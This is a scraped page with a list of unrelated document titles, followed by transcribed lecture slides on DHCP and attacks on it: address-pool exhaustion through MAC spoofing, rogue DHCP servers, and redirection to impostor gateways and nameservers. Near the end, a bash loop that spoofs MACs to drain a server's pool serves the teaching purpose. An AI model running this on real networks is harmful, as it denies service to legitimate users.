Using the DHCP protocol for a denial-of



Similar documents
DHCP Server. Heng Sovannarith

50.XXX is based on your station number

IP Address: the per-network unique identifier used to find you on a network

Linux Networking Basics

TCP/IP Network Essentials. Linux System Administration and IP Services

Trend Micro Incorporated reserves the right to make changes to this document and to the products described herein without notice.

ICS 351: Today's plan. IP addresses Network Address Translation Dynamic Host Configuration Protocol Small Office / Home Office configuration

- Basic Router Security -

Trend Micro Encryption Gateway 5

pp=pod number, xxx=static IP address assigned to your pod

Chapter 3 LAN Configuration

Network Security. Chapter 3. Cornelius Diekmann. Version: October 21, Lehrstuhl für Netzarchitekturen und Netzdienste Institut für Informatik

Lab Objectives & Turn In

LAB THREE STATIC ROUTING

Sniffing in a Switched Network

Smoothwall Web Filter Deployment Guide

LAN TCP/IP and DHCP Setup

HOST AUTO CONFIGURATION (BOOTP, DHCP)

CCNA Exploration: Accessing the WAN Chapter 7 Case Study

Own your LAN with Arp Poison Routing

Lab PC Network TCP/IP Configuration

This Lecture. The Internet and Sockets. The Start If everyone just sends a small packet of data, they can all use the line at the same.

Savvius Insight Initial Configuration

Introduction to Network. Topics

Practical Network Forensics

Corso di Configurazione e Gestione di Reti Locali

Configuring Routers and Their Settings

IPv6.marceln.org.

Fireware How To Network Configuration

Red Hat Linux Networking

UNIVERSIDADE DA BEIRA INTERIOR Faculdade de Engenharia Departamento de Informática

Building a Penetration Testing Virtual Computer Laboratory

netkit lab static-routing Università degli Studi Roma Tre Dipartimento di Informatica e Automazione Computer Networks Research Group

Chapter 4 Customizing Your Network Settings

ARP and DNS. ARP entries are cached by network devices to save time, these cached entries make up a table

ICS 351: Today's plan

How to Enable Internet for Guest Virtual Machine using Wi-Fi wireless Internet Connection.

SY system so that an unauthorized individual can take over an authorized session, or to disrupt service to authorized users.

Dynamic Host Configuration Protocol (DHCP) 02 NAT and DHCP Tópicos Avançados de Redes

Hands-on MESH Network Exercise Workbook

Recent advances in IPv6 insecurities Marc van Hauser Heuse Deepsec 2010, Vienna Marc Heuse

Information Security Training. Assignment 1 Networking

CMPT 471 Networking II

Security of IPv6 and DNSSEC for penetration testers

CS197U: A Hands on Introduction to Unix

Packet Sniffer Detection with AntiSniff

Network Configuration

The Barracuda Network Connector. System Requirements. Barracuda SSL VPN

Project 2: Firewall Design (Phase I)

Packet Sniffing and Spoofing Lab

Teldat Router. ARP Proxy

Authenticating a Lucent Portmaster 3 with Microsoft IAS and Active Directory

Cable Internet Connection & Sharing using Red Hat 7.2 (Version 1.0, )

Attack Lab: Attacks on TCP/IP Protocols

CSIS 3230 Computer Networking Principles, Spring 2012 Lab 7 Domain Name System (DNS)

Hacking Techniques & Intrusion Detection

NXT Controller Manual IP Assignment in WAN Environments Application Note

Using a simple crossover RJ45 cable, you can directly connect your Dexter to any computer.

NETGEAR ProSAFE WC9500 High Capacity Wireless Controller

Computer Networks. Introduc)on to Naming, Addressing, and Rou)ng. Week 09. College of Information Science and Engineering Ritsumeikan University

Chapter 5 Customizing Your Network Settings

Service Managed Gateway TM. How to Configure a Firewall

Exploring Layer 2 Network Security in Virtualized Environments. Ronny L. Bull & Jeanna N. Matthews

IP network tools & troubleshooting. AFCHIX 2010 Nairobi, Kenya October 2010

IPv6 Hardening Guide for Windows Servers

Internet Addresses (You should read Chapter 4 in Forouzan)

IP-PBX Quick Start Guide

Tcpdump Lab: Wired Network Traffic Sniffing

Internetworking. Problem: There is more than one network (heterogeneity & scale)

TCP/IP Security Problems. History that still teaches

Local DNS Attack Lab. 1 Lab Overview. 2 Lab Environment. SEED Labs Local DNS Attack Lab 1

Exploring Layer 2 Network Security in Virtualized Environments. Ronny L. Bull & Jeanna N. Matthews

PFSENSE Load Balance with Fail Over From Version Beta3

THE HONG KONG POLYTECHNIC UNIVERSITY Department of Electronic and Information Engineering

Vocia MS-1 Network Considerations for VoIP. Vocia MS-1 and Network Port Configuration. VoIP Network Switch. Control Network Switch

A S B

BASIC TCP/IP NETWORKING

IPv6 in Axis Video Products

Configuration Guide. DHCP Server. LAN client

Configuring your network settings to use Google Public DNS

Services. Vyatta System. REFERENCE GUIDE DHCP DHCPv6 DNS Web Caching LLDP VYATTA, INC.

DNS Pharming Attack Lab

Computer Networks. Lecture 3: IP Protocol. Marcin Bieńkowski. Institute of Computer Science University of Wrocław

PART IV. Network Layer

How To Understand and Configure Your Network for IntraVUE

Computer Networks I Laboratory Exercise 1

Abstract. Introduction. Section I. What is Denial of Service Attack?

CS 348: Computer Networks. - IP addressing; 21 st Aug Instructor: Sridhar Iyer IIT Bombay

Firewalls and Intrusion Detection

Using Cisco UC320W with Windows Small Business Server

LECTURE 4 NETWORK INFRASTRUCTURE

Instructor Notes for Lab 3

1 Data information is sent onto the network cable using which of the following? A Communication protocol B Data packet

Use MAC-Forced Forwarding with DHCP Snooping to Create Enhanced Private VLANs

No need to operate a DHCP server. If a server s IP address changes, clients will lose the ability to access it!

Transcription:

Using the DHCP protocol for a denial-of of-service attack David Morgan Denial of service stategy against a DHCP server server issues IP addresses per MAC addresses administers a fixed pool of IPs stops issuing when it runs out perhaps we can artificially make it run out 1

DHCP protocol conversations how IPs are provided sequence of 4 message types discover from client ethernet broadcast offer from server to client request from client to server acknowledgment from server to client Initial dhcp server on D others lack IP addresses /var/lib/dhcpd/dhcpd.leases if linux dhcp leases: 01 is free 02 is free 03 is free 2

B broadcasts discover I need an IP; my MAC is. Can somebody help? D sends offer if it runs a dhcp server program How about 01? You want that? 3

B sends D request for what was offered Yes please. I want to use 01. D sends B acknowlegement All right then, please go ahead; 01 is yours to use. 4

B uses it, D records it 01 ifconfig eth0 01 has 01 02 is free 03 is free C broadcasts discover 01 I need an IP; my MAC is. Can somebody help? 5

D sends offer 01 How about 02? You want that? C sends D request for what was offered 01 4 Yes please. I want to use 02. 6

D sends C acknowlegement 01 All right then, please go ahead; 02 is yours to use. C uses it, D records it 01 02 ifconfig eth0 02 has 01 has 02 03 is free 7

E broadcasts discover 01 02 I need an IP; my MAC is. Can somebody help? D sends offer 01 02 How about 03? You want that? 8

E sends D request for what was offered 01 02 Yes please. I want to use 03. D sends E acknowlegement 01 02 All right then, please go ahead; 03 is yours to use. 9

E uses it, D records it 01 02 03 has 01 has 02 has 03 ifconfig eth0 02 A broadcasts discover 01 02 03 I need an IP; my MAC is. Can somebody help? 10

D sends no offer (nor anything) 01 02 03 I already gave away all 3 addresses. None left. Too bad I can t help him. DHCP serves more than addresses routers gateway for non-local destination IPs nameservers where to find out names IPs other stuff 11

D sends B more stuff, B implements/adopts it all Please go ahead your IP: 01 your router: your nameserver: 66.207.15.100 ifconfig eth0 01 route add default gw echo nameserver 66.207.15.100 >> /etc/resolv.conf Now for unreasonable distortions 1. a single machine can consume all server s IPs 2. a machine can run a competing dhcp server 3. a dhcp server can misdirect hosts to imposters gateways name servers 12

Unreasonable distortion #1 consuming all the IPs anybody can get an IP from a server server just needs your MAC spoof a lot of MACs, request an IP for each until server is run out of business Unreasonable distortion #1: exhausting server s s IP pool I need an IP, and my MAC is FF:FF:00:00:00:55 I need an IP, and my MAC is 00:00:FF:12:34:56 I need an IP, and my MAC is 66:BB:CC:11:11:11 13

D obliges itself out of IPs 03 00:00:FF:12:34:56 0. 1 0 1 0. 1 0 2 FF:FF:00:00:00:55 has 01 66:BB:CC:11:11:11 has 02 00:00:FF:12:34:56 has 03 MAC spoof in linux ifconfig eth0 hw ether 11:22:33:44:55:66 server will give you different IPs as long as you present distinct MACs pseudo-code: loop end loop assume new MAC request another IP 14

Unreasonable distortion #2: a competing dhcp server 10.0.0.2 You can take 192.168.1.199. OK?? who wins?? How about 03? You want that? You gotta be quick, gunslinger! indeterminate might depend on planetary alignment but speed helps a lot 15

B beats out real server D if B is faster outside B s control D is prevented by prior denial of service attack under B s control please see unreasonable distortion #1 Unreasonable distortion #3 downstream misdirection tell hosts to use an imposter router routers forward the imposter router could sniff while forwarding tell hosts to use an imposter nameserver nameservers redirect the imposter nameserver can direct to wherever wherever could phish and phake and phrolic 16

Run on client to implement dos clear interface="eth0" for i in 0 1 2 3 4 5 6 7 8 9 F do number=$random; j=$[number %= 10] number=$random; k=$[number %= 10] mac="aa:bb:cc:$i$i:$j$j:$k$k" ifconfig $interface down echo -e "\n\ninterface's current addresses:" ifconfig eth0 grep -E "HWaddr inet addr" echo -en "\n --> Press key to request IP for bogus MAC: $mac \n" read ifconfig $interface hw ether $mac ifconfig $interface up killall dhclient;sleep 1 dhclient $interface done Run on server to observe watch 'grep -E "lease hardware" /var/lib/dhcpd/dhcpd.leases grep -v \#;echo -n -e "\nnumber of outstanding leases: "; grep "lease 10" /var/lib/dhcpd/dhcpd.leases sort uniq wc -l' 17

Please see Flaws within the Dynamic Host Configuration Protocol http://www.networkpenetration.com/dhcp_flaws.html 18